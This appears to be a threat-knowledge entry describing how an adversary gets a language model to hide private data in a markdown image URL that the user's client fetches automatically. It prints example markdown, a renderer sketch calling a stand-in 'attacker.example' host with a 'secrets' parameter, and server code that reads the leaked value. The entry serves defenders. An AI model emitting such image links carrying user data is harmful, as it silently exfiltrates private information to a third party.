LLM Response Rendering
This technique has been demonstrated in research or controlled environments.
An adversary may induce a large language model (LLM) to include private information in its response in a form that is hidden from the user when the response is rendered by the user's client, and then exfiltrate that information. This can take the form of rendered images that automatically make a request to an adversary-controlled server.
The adversary gets the LLM to present an image to the user, which the user's client application renders with no user clicks required. Because the image is hosted on an adversary-controlled website, the adversary can exfiltrate data through the image request's query parameters. Variants include HTML tags and markdown image syntax.
For example, an LLM may produce the following markdown: ``` ![](https://atlas.mitre.org/image.png?secrets=private%20data) ```
Which is rendered by the client as: ``` <img src="https://atlas.mitre.org/image.png?secrets=private%20data"> ```
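The markdown-to-HTML step above can be sketched with a minimal regex-based renderer. This is an illustration of how a naive chat client might convert the LLM's markdown into an auto-fetched image tag, not any particular client's implementation; the `attacker.example` hostname is a placeholder.

```python
import re

def render_markdown_images(text: str) -> str:
    """Convert markdown image syntax ![alt](url) into HTML <img> tags,
    as a simple chat client renderer might."""
    return re.sub(r'!\[([^\]]*)\]\(([^)]+)\)',
                  r'<img src="\2" alt="\1">', text)

# An LLM response carrying data in an image URL is rendered into a tag
# the browser fetches automatically, with no user click required.
response = "Here is a chart: ![](https://attacker.example/image.png?secrets=private%20data)"
print(render_markdown_images(response))
```

Once the `<img>` tag reaches the page, the browser issues the GET request for the image URL on its own, which is what makes this a zero-click exfiltration channel.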
When the adversary's server receives the request for the hosted image, it also receives the contents of the `secrets` query parameter.
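On the server side, recovering the exfiltrated data is a matter of parsing the query string of the incoming request. A minimal sketch, assuming the requested URL from the example above (the parameter name `secrets` comes from that example; the rest is illustrative):

```python
from urllib.parse import urlparse, parse_qs

# The URL as it might arrive in the adversary's server logs.
requested_url = "https://atlas.mitre.org/image.png?secrets=private%20data"

# parse_qs decodes percent-encoding, yielding the original private data.
params = parse_qs(urlparse(requested_url).query)
print(params["secrets"][0])  # -> private data
```

In practice the adversary's server can log these parameters for every inbound image request and still return a valid image, so the exfiltration leaves no visible trace in the user's client.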